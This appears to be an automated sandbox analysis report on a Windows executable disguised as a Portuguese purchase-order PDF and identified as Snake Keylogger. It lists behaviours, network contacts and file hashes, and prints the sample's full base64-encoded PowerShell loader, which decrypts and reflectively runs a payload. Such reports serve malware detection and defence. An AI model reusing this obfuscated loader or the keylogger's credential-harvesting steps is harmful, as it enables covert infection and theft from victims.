Analysis Overview
SHA256
5bd156709999e6e8512b0c83fdece1d670c4961c2e1e9ccfe1c43621a683ea2a
Threat Level: Known bad
The file NOVO_PEDIDO_DE_COMPRA_____pdf.exe was found to be: Known bad.
Malicious Activity Summary
Snake Keylogger
Snake Keylogger payload
Accesses Microsoft Outlook profiles
Looks up external IP address via web service
Suspicious use of SetThreadContext
Unsigned PE
Command and Scripting Interpreter: PowerShell
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
outlook_office_path
outlook_win_path
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-13 11:17
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-13 11:17
Reported
2024-05-13 11:19
Platform
win7-20240508-en
Max time kernel
119s
Max time network
124s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\NOVO_PEDIDO_DE_COMPRA_____pdf.exe
"C:\Users\Admin\AppData\Local\Temp\NOVO_PEDIDO_DE_COMPRA_____pdf.exe"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-13 11:17
Reported
2024-05-13 11:19
Platform
win10v2004-20240426-en
Max time kernel
135s
Max time network
136s
Command Line
Signatures
Snake Keylogger
Snake Keylogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3084 set thread context of 3472 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\NOVO_PEDIDO_DE_COMPRA_____pdf.exe
"C:\Users\Admin\AppData\Local\Temp\NOVO_PEDIDO_DE_COMPRA_____pdf.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -EncodedCommand CgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA0AEEALAAwAHgAMAA0ACwAMAB4AEUARgAsADAAeAA4ADUALAAwAHgAMwA4ACwAMAB4ADkAMAAsADAAeABGAEUALAAwAHgANAA4ACwAMAB4ADQANgAsADAAeABGADIALAAwAHgAMgA5ACwAMAB4AEEARQAsADAAeABBADkALAAwAHgAOAA2ACwAMAB4ADcAQQAsADAAeAA1ADcALAAwAHgANQBCACwAMAB4AEEANgAsADAAeABCADEALAAwAHgANAAwACwAMAB4ADgAQQAsADAAeABFADEALAAwAHgAMAAwACwAMAB4ADMANAAsADAAeAA5AEQALAAwAHgARQA2ACwAMAB4ADMAMwAsADAAeAA3ADQALAAwAHgARQBEACwAMAB4ADIAMgAsADAAeABEADMALAAwAHgAMABFACkACgAkABFUz5EgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAwADQALAAwAHgAQwA3ACwAMAB4ADAAMwAsADAAeAA2ADcALAAwAHgAMQBFACwAMAB4AEYAQQAsADAAeAAyADcALAAwAHgAQgBBACwAMAB4ADEANQAsADAAeABDADEALAAwAHgAQgBCACwAMAB4AEQANAAsADAAeAA3AEEALAAwAHgANQA0ACwAMAB4ADkANQAsADAAeAA3ADgAKQAKAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwAKAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAJCWz4WXeuNTIAB7AAoAIAAgACAAIABbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAIAA9ACAAIgBHAGUAdABGAG8AcgBlAGcAcgBvAHUAbgBkAFcAaQBuAGQAbwB3ACIAKQBdAAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgALeD1lNTX01Sl3rjUygAKQA7AAoACgAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAAgAD0AIAAiAFMAaABvAHcAVwBpAG4AZABvAHcAIgApAF0ACgAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIAA+Zjp5l3rjUygASQBuAHQAUAB0AHIAIACXeuNT5VPEZywAIABpAG4AdAAgAH1U5E4pADsACgAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAHYAbwBpAGQAIACQls+FU19NUpd641MoACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAEkAbgB0AFAAdAByACAA5VPEZyAAPQAgALeD1lNTX01Sl3rjUygAKQA7AAoAIAAgACAAIAAgACAAIAAgAD5mOnmXeuNTKADlU8RnLAAgADAAKQA7AAoAIAAgACAAIAB9AAoAfQAKACIAQAAgAC0ATABhAG4AZwB1AGEAZwBlACAAQwBTAGgAYQByAHAACgAKAFsAkJbPhZd641NdADoAOgCQls+FU19NUpd641MoACkACgAKACQAh2X2Tu+NhF8gAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtAHMAdwBvAHQAZQAwADUAeABkAC4AdABtAHAAJwA7AAoAJACgUsZbV1uCgiAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJACHZfZO742EXykAOwAKACQA44nGW4VRuVsgAD0AIADjicZbIAAtAKWUGVMgACQApZQZUyAALQARVM+RIAAkABFUz5EgAC0AcGVuYyAAJACgUsZbV1uCggoACgAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACQAZVHjU7lwIAA9ACAAJAALeo9expYuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAZVHjU7lwLgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAJABuAHUAbABsACkAOwAKAA=="
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -EncodedCommand CgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA0AEEALAAwAHgAMAA0ACwAMAB4AEUARgAsADAAeAA4ADUALAAwAHgAMwA4ACwAMAB4ADkAMAAsADAAeABGAEUALAAwAHgANAA4ACwAMAB4ADQANgAsADAAeABGADIALAAwAHgAMgA5ACwAMAB4AEEARQAsADAAeABBADkALAAwAHgAOAA2ACwAMAB4ADcAQQAsADAAeAA1ADcALAAwAHgANQBCACwAMAB4AEEANgAsADAAeABCADEALAAwAHgANAAwACwAMAB4ADgAQQAsADAAeABFADEALAAwAHgAMAAwACwAMAB4ADMANAAsADAAeAA5AEQALAAwAHgARQA2ACwAMAB4ADMAMwAsADAAeAA3ADQALAAwAHgARQBEACwAMAB4ADIAMgAsADAAeABEADMALAAwAHgAMABFACkACgAkABFUz5EgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAwADQALAAwAHgAQwA3ACwAMAB4ADAAMwAsADAAeAA2ADcALAAwAHgAMQBFACwAMAB4AEYAQQAsADAAeAAyADcALAAwAHgAQgBBACwAMAB4ADEANQAsADAAeABDADEALAAwAHgAQgBCACwAMAB4AEQANAAsADAAeAA3AEEALAAwAHgANQA0ACwAMAB4ADkANQAsADAAeAA3ADgAKQAKAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwAKAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAJCWz4WXeuNTIAB7AAoAIAAgACAAIABbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAIAA9ACAAIgBHAGUAdABGAG8AcgBlAGcAcgBvAHUAbgBkAFcAaQBuAGQAbwB3ACIAKQBdAAoAIAAgACAAIABwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgALeD1lNTX01Sl3rjUygAKQA7AAoACgAgACAAIAAgAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAAgAD0AIAAiAFMAaABvAHcAVwBpAG4AZABvAHcAIgApAF0ACgAgACAAIAAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIAA+Zjp5l3rjUygASQBuAHQAUAB0AHIAIACXeuNT5VPEZywAIABpAG4AdAAgAH1U5E4pADsACgAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAHYAbwBpAGQAIACQls+FU19NUpd641MoACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAEkAbgB0AFAAdAByACAA5VPEZyAAPQAgALeD1lNTX01Sl3rjUygAKQA7AAoAIAAgACAAIAAgACAAIAAgAD5mOnmXeuNTKADlU8RnLAAgADAAKQA7AAoAIAAgACAAIAB9AAoAfQAKACIAQAAgAC0ATABhAG4AZwB1AGEAZwBlACAAQwBTAGgAYQByAHAACgAKAFsAkJbPhZd641NdADoAOgCQls+FU19NUpd641MoACkACgAKACQAh2X2Tu+NhF8gAD0AIAAnAEMAOgBcAFwAVQBzAGUAcgBzAFwAXABBAGQAbQBpAG4AXABcAEEAcABwAEQAYQB0AGEAXABcAEwAbwBjAGEAbABcAFwAVABlAG0AcABcAFwAZgBpAGwAZQAtAHMAdwBvAHQAZQAwADUAeABkAC4AdABtAHAAJwA7AAoAJACgUsZbV1uCgiAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJACHZfZO742EXykAOwAKACQA44nGW4VRuVsgAD0AIADjicZbIAAtAKWUGVMgACQApZQZUyAALQARVM+RIAAkABFUz5EgAC0AcGVuYyAAJACgUsZbV1uCggoACgAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACQAZVHjU7lwIAA9ACAAJAALeo9expYuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAKACQAZVHjU7lwLgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAJABuAHUAbABsACkAOwAKAA==
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jce4z1ea\jce4z1ea.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3D67.tmp" "c:\Users\Admin\AppData\Local\Temp\jce4z1ea\CSCB98BECC0E93848A29451D754C1AA77D.TMP"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 0.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.88:443 | www.bing.com | tcp |
| NL | 23.62.61.88:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 88.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| JP | 132.226.8.169:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | 169.8.226.132.in-addr.arpa | udp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 172.67.177.134:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | 134.177.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | scratchdreams.tk | udp |
| US | 172.67.169.18:443 | scratchdreams.tk | tcp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.169.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
Files
memory/3084-2-0x00007FFA0ED43000-0x00007FFA0ED45000-memory.dmp
memory/3084-8-0x00000287D8E40000-0x00000287D8E62000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xihxwwuo.n1a.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3084-13-0x00007FFA0ED40000-0x00007FFA0F801000-memory.dmp
memory/3084-14-0x00007FFA0ED40000-0x00007FFA0F801000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\jce4z1ea\jce4z1ea.cmdline
| MD5 | a066b8aeb62157ab99b36012e380c41a |
| SHA1 | b8776c2b7a36ba490ed212c04f442688b36fb707 |
| SHA256 | 0911d11820d618d943c84ad94d51449e28ce3fd9541619cd9940c30fb08e2c1d |
| SHA512 | add2e6f6d7d0a77d9c898954def5d4131b36fe8dc8ff1bc641f555e7b73d4b6e392e9f28b41df67ba3c0090f445cdc5cec0f1b930f14f182bbb18ec751046fc8 |
\??\c:\Users\Admin\AppData\Local\Temp\jce4z1ea\jce4z1ea.0.cs
| MD5 | 2d582d49bc5da0270e19e27903336497 |
| SHA1 | 01065a81afc9e4ec356ef1998ec15535f7ea5d09 |
| SHA256 | 1104ec9aaa6d72466e966359f4e147da4a11ac8ba4c1d36f45fdf83ee76e16dc |
| SHA512 | 03ef2d744cc6152d5723574d34bf06c5bd65264999e8eade3e48159367fb05067cd071ee37225947ff4b9286d0f11b6963e2d42a1e9c26a3ffc47b76bbf3a5e6 |
\??\c:\Users\Admin\AppData\Local\Temp\jce4z1ea\CSCB98BECC0E93848A29451D754C1AA77D.TMP
| MD5 | 88e5fa62f4f033194f9cfe1c914dae0e |
| SHA1 | 655ad9c6bfbb1828401ee30b45cedf807c1e07c4 |
| SHA256 | 4dbb3f77580eadf629219c623557d1a862be646929d8823e05138520392870d7 |
| SHA512 | 1fa9ce4487afdbb32d312d079c2ff882de2d59c3fe455f3120d0dbcd4c5d2287eb2cc98b06dd12358bd640350fffca003f96d277d3c51912a561f306ce15afa2 |
C:\Users\Admin\AppData\Local\Temp\RES3D67.tmp
| MD5 | 4b651cd6ef032afeaee49eca11bbeaa8 |
| SHA1 | 771628888baa6c42fffd518b303f04beeec776ac |
| SHA256 | e1ccb3d392c2f90fa80bd4f783d2c0a9f79d4763cbb62c74e864e31e914bbdfa |
| SHA512 | 44e1fb1958e9852d36ca5a6ba23d6d899dc52bc553ddcdc8bb3495e4f4e1756ea7664a1e851bd3c9e0192069a73f3ddc5156314579b6fc68c08c1a944a246a3e |
C:\Users\Admin\AppData\Local\Temp\jce4z1ea\jce4z1ea.dll
| MD5 | f1cc934c8007dbea22f03c9781063297 |
| SHA1 | 2b1de0f687e71d31f548b5eb4398e7d7a5a3946e |
| SHA256 | b8d249b524f486dfd4bcfed4a7ccf7efb7cca54eb4dbd463461702d0d935d763 |
| SHA512 | bb7cf97cfde2a8d807460ce64e58ce445d194e36f9456f4ab946645c5bca4ecd09d5fee9a9619b8ee5305f76dcd19a22c3802684adfaa7deecf85ef37b80d4be |
memory/3084-27-0x00000287D8E90000-0x00000287D8E98000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\file-swote05xd.tmp
| MD5 | fec0ee7beb18cfe6da97e99a57898163 |
| SHA1 | f9bfefcfe79858383586541d2ec250e0060fc42c |
| SHA256 | 301f949a952c4705d69f2d7fcaf13e7055542142d249f7e57793c3548f1c56f7 |
| SHA512 | 2a263c00c95654c7b0ab784f372d59183bf21132ddf4a39a4935cf17a98e1b760fc26ed217c415d1ddeeac8595477e1503fd917d8b878771da7a9501c3c29362 |
memory/3084-30-0x00000287D8EA0000-0x00000287D8EAA000-memory.dmp
memory/3084-31-0x00000287DB420000-0x00000287DB49A000-memory.dmp
memory/3472-32-0x0000000000400000-0x0000000000426000-memory.dmp
memory/3472-33-0x00000000056C0000-0x0000000005C64000-memory.dmp
memory/3472-34-0x00000000051B0000-0x000000000524C000-memory.dmp
memory/3084-35-0x00007FFA0ED40000-0x00007FFA0F801000-memory.dmp
memory/3472-36-0x0000000001140000-0x0000000001190000-memory.dmp
memory/3472-37-0x0000000006780000-0x0000000006942000-memory.dmp
memory/3472-38-0x0000000006650000-0x00000000066E2000-memory.dmp
memory/3472-39-0x00000000051A0000-0x00000000051AA000-memory.dmp